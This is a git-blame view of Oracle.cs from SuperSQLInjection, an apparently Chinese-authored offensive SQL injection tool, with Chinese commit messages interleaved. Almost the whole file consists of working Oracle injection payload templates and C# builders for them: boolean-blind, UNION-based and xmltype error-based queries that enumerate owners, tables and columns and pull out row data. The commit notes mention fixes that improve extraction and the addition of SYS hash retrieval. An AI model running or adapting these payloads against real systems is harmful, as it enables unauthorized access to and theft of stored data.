shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
419a7ce1c2afe1e6ec6450ab2f178a46e60c7e4a
SuperSQLInjectionV1/SuperSQLInjection/payload/Oracle.cs

175 lines
7.4 KiB
C#
Raw Normal View History

添加项目文件。
2017-03-13 16:12:15 +08:00
using System;
using System.Collections.Generic;
using System.Text;
using tools;
namespace SuperSQLInjection.payload
{
class Oracle
{
//加载对应配置(需要读取的环境变量)
update20181216 20181216 V1.0 正式版--- 修复SQLServer延时盲注paylaod缺少and导致语句错误无法获取数据的问题。 修复优化自动识别注入漏报和选择类型错误的问题。 修复bool延时注入时,获取数据判断数据大小方式不正确的问题。 修复错误显示注入获取数据时,数据可能被HTML编码或转义到导致数据不正确的问题。 修复延时注入在正常页面响应速度非常快的情况下,由于计数器可能有误差,导致判断值不正确,而无法正确获取数据(设置了20*time毫秒的误差值)。 修复读取文件,执行命令无法使用延时判断问题。 优化配置文件。 新增支持注入PostgreSQL,目前可获取数据,执行命令和文件操作稍后版本更新。
2018-12-16 01:24:43 +08:00
public static String path = "config/vers/oracle.txt";
添加项目文件。
2017-03-13 16:12:15 +08:00
public static List<String> vers = FileTool.readFileToList(path);
public static String err_hex_len = "(select length(rawtohex({data})) from dual)";
//数据库数量
public static String dbs_count = "(select count(distinct(owner)) from sys.all_tables)";
//表数量
update20190823 update20190823
2019-08-23 16:34:43 +08:00
public static String tables_count = "(select count(1) from sys.all_tables where owner='{dbname}')";
添加项目文件。
2017-03-13 16:12:15 +08:00
//列数量
update20190823 update20190823
2019-08-23 16:34:43 +08:00
public static String columns_count = "(select count(1) from sys.all_tab_columns where owner='{dbname}' and table_name='{table}')";
添加项目文件。
2017-03-13 16:12:15 +08:00
//获取数据库名
public static String db_value = "(select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit={index})";
//获取表名称
public static String table_value = "(select table_name from (select table_name,rownum as limit from (select table_name from sys.all_tables where owner='{dbname}')) where limit={index})";
//获取列名称
public static String column_value = "(select column_name from (select column_name,rownum as limit from (select column_name from sys.all_tab_columns where owner='{dbname}' and table_name='{table}')) where limit={index})";
//获取数据库数量bool方式
update 20181117 库表列新增全选和反选功能。 优化底部日志显示,增加色彩。 修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。 注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
2018-11-17 00:46:02 +08:00
public static String bool_db_count = " " + dbs_count + ">{len}";
添加项目文件。
2017-03-13 16:12:15 +08:00
//获取表数量bool
update 20181117 库表列新增全选和反选功能。 优化底部日志显示,增加色彩。 修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。 注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
2018-11-17 00:46:02 +08:00
public static String bool_tables_count = " " + tables_count + ">{len}";
添加项目文件。
2017-03-13 16:12:15 +08:00
//获取列数量bool
update 20181117 库表列新增全选和反选功能。 优化底部日志显示,增加色彩。 修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。 注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
2018-11-17 00:46:02 +08:00
public static String bool_columns_count = " " + columns_count + ">{len}";
添加项目文件。
2017-03-13 16:12:15 +08:00
public static String substr = "substr(({data})),{index},1)";
//多字节
public static String hex_value = "rawtohex(substr({data},{index},1))";
//bool方式字符长度判断
update 20181117 库表列新增全选和反选功能。 优化底部日志显示,增加色彩。 修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。 注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
2018-11-17 00:46:02 +08:00
public static String bool_length = " length({data})>{len}";
添加项目文件。
2017-03-13 16:12:15 +08:00
//bool方式获取值
update 20181117 库表列新增全选和反选功能。 优化底部日志显示,增加色彩。 修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。 注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
2018-11-17 00:46:02 +08:00
public static String bool_value = " ascii(substr({data},{index},1))>{len}";
添加项目文件。
2017-03-13 16:12:15 +08:00
//获取行数据
update20181212 20181212 V1.0 正式版--- 修复MySQL盲注时,在某些情况下,获取的每列数据可能不对应的问题。 修复Oracle盲注获取数据的语句。 修复盲注时,提示需要配置Union注入问题。 优化配置文件,降低数据库类型漏报,增加oracle获取SYS_HASH的语句
2018-12-12 17:29:32 +08:00
public static String data_value = "(select {data} from (select {allcolumns},rownum as limit from {dbname}.{table}) where limit={index})";
添加项目文件。
2017-03-13 16:12:15 +08:00
//union获取数据条数
update20190823 update20190823
2019-08-23 16:34:43 +08:00
public static String data_count = "(select count(1) from {dbname}.{table})";
update20181216 20181216 V1.0 正式版--- 修复SQLServer延时盲注paylaod缺少and导致语句错误无法获取数据的问题。 修复优化自动识别注入漏报和选择类型错误的问题。 修复bool延时注入时,获取数据判断数据大小方式不正确的问题。 修复错误显示注入获取数据时,数据可能被HTML编码或转义到导致数据不正确的问题。 修复延时注入在正常页面响应速度非常快的情况下,由于计数器可能有误差,导致判断值不正确,而无法正确获取数据(设置了20*time毫秒的误差值)。 修复读取文件,执行命令无法使用延时判断问题。 优化配置文件。 新增支持注入PostgreSQL,目前可获取数据,执行命令和文件操作稍后版本更新。
2018-12-16 01:24:43 +08:00
public static String bool_datas_count = " " + data_count + ">={len}";
添加项目文件。
2017-03-13 16:12:15 +08:00
//union获取值
update 20181117 库表列新增全选和反选功能。 优化底部日志显示,增加色彩。 修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。 注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
2018-11-17 00:46:02 +08:00
public static String union_value = " 1=2 union all select {data} from dual";
添加项目文件。
2017-03-13 16:12:15 +08:00
//error方式
update 20181117 库表列新增全选和反选功能。 优化底部日志显示,增加色彩。 修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。 注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
2018-11-17 00:46:02 +08:00
public static String error_value = " 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex(cast(({data}) as varchar(256)))||chr(58)||chr(45)||chr(45)||chr(62))) from dual)";
添加项目文件。
2017-03-13 16:12:15 +08:00
update 20181117 库表列新增全选和反选功能。 优化底部日志显示,增加色彩。 修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。 注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
2018-11-17 00:46:02 +08:00
public static String substr_error_value = " 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||substr(rawtohex(cast(({data}) as varchar(256))),{start},{len})||chr(58)||chr(45)||chr(45)||chr(62))) from dual)";
添加项目文件。
2017-03-13 16:12:15 +08:00
public static String getUnionDataValue(int columnsLen, int showIndex, String dataPayLoad, String dbname, String table, String index)
{
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append("(chr(94)||chr(94)||chr(33)||"+dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index) + "||chr(33)||chr(94)||chr(94)),");
}
else
{
sb.Append("null,");
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index));
sb.Append(",");
}
else
{
sb.Append("null,");
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
public static String getErrorDataValue(String dataPayLoad, String dbname, String table, String index)
{
String data=dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index);
return error_value.Replace("{data}", data);
}
public static String getErrorDataLen(List<String> columns, String dbname, String table, String index)
{
return err_hex_len.Replace("{data}", getDataValue(columns, dbname, table, index));
}
public static String unionCastColumns(List<String> columns, String unionStr)
{
StringBuilder sb = new StringBuilder();
foreach (String column in columns)
{
sb.Append("cast(" + column + " as varchar(4000))" +unionStr);
}
sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
return sb.ToString();
}
/// <summary>
/// 值的长度
/// </summary>
/// <param name="dataPayload"></param>
/// <returns></returns>
public static String getBoolLengthPayLoad(String dataStr, int len)
{
bool_length.Replace("{data}", hex_value.Replace("{data}", dataStr)).Replace("{len}", len.ToString());
return dataStr;
}
/// <summary>
/// 获得bool方式值payload
/// </summary>
/// <param name="dataStr">对应值的查询SQL</param>
/// <param name="dbName">数据库名</param>
/// <param name="table">表名</param>
/// <param name="index">下标</param>
/// <returns></returns>
update20181212 20181212 V1.0 正式版--- 修复MySQL盲注时,在某些情况下,获取的每列数据可能不对应的问题。 修复Oracle盲注获取数据的语句。 修复盲注时,提示需要配置Union注入问题。 优化配置文件,降低数据库类型漏报,增加oracle获取SYS_HASH的语句
2018-12-12 17:29:32 +08:00
public static String getBoolDataPayLoad(String column, String dbName, String table, int index)
添加项目文件。
2017-03-13 16:12:15 +08:00
{
update20181212 20181212 V1.0 正式版--- 修复MySQL盲注时,在某些情况下,获取的每列数据可能不对应的问题。 修复Oracle盲注获取数据的语句。 修复盲注时,提示需要配置Union注入问题。 优化配置文件,降低数据库类型漏报,增加oracle获取SYS_HASH的语句
2018-12-12 17:29:32 +08:00
String payload = data_value.Replace("{data}", column).Replace("{allcolumns}", column).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index.ToString());
添加项目文件。
2017-03-13 16:12:15 +08:00
return payload;
}
public static String getDataValue(List<String> columns, String dbName, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||");
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index));
sb.Append(",");
sb.Remove(sb.Length - 1, 1);
return sb.ToString();
}
}
}
Reference in New Issue Copy Permalink